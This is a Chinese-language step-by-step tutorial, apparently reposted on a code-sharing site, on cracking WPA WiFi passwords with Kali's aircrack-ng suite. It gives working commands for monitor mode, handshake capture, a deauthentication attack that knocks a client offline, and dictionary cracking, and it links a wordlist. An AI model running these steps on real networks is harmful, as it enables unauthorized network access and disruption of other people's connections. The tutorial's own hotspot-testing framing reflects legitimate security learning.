kali破解wifi密碼


開始

1、選擇合適的網卡,有些網卡kali識別不了,我用的網卡信息

2、網卡開啟監聽模式

 3、查看監聽模式是否開啟成功(網卡名稱變成wlan0mon說明已經開啟成功)

 4、輸入“airodump-ng wlan0mon”,掃描附近熱點信息,找到自己想要破解的熱點名稱后按下ctrl+c停止掃描(NEM-AL10是我自己用手機開啟的熱點,破解他人無線密碼是違法的,自己搭個熱點玩玩就行)

 5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目錄}”輸入:airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,當抓到握手包的時候箭頭處會顯示”handshake“字樣

 

 6、可以看到現在抓不到握手包,是因為沒有客戶端與AP進行連接。但是我們看到了一個已連接的熱點,我們發送反認證包,讓其下線,然后改客戶端會重新嘗試連接熱點,然后我們就可以抓到握手包了。

新開一個終端窗口,命令格式為:aireplay-ng -0 {發送反認證包的個數} -a {BSSID} -c {強制下線的MAC地址(STATION下面的地址)} 無線網卡名稱

輸入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系統會下線,然后重新連接,然后我們就可以抓到握手包了。

 

 7、按下ctrl+c停止抓包。進到/home目錄下查看握手包,其中"-01.cap"是我們一會兒破解要用到的數據包

 

 8、使用aircrack-ng進行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的關鍵)} {握手包}

輸入"aircrack-ng -w top3000.txt /home/-01.cap",由於握手包命名的特殊性,這里只能使用絕對路徑,可以改個名字就可以使用相對路徑了

字典網上有好多,這個是github上的:https://github.com/conwnet/wpa-dictionary

 結語:

破解的原理還是一個一個試,之所以要抓握手包,是因為握手包中含有經過加密的密碼,我們將握手包抓下來后,可以在本地跑字典破解,並且每秒鍾可以試幾萬個密碼,但是如果沒有握手包,我們只能手動輸密碼,那樣是很慢的,即使可以用程序來跑,也不能保證路由器沒有設置錯誤次數,有可能會禁止連接,即使沒有設置錯誤次數,但是每次與路由器交互的過程所需要耗費的時間也大於一秒。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM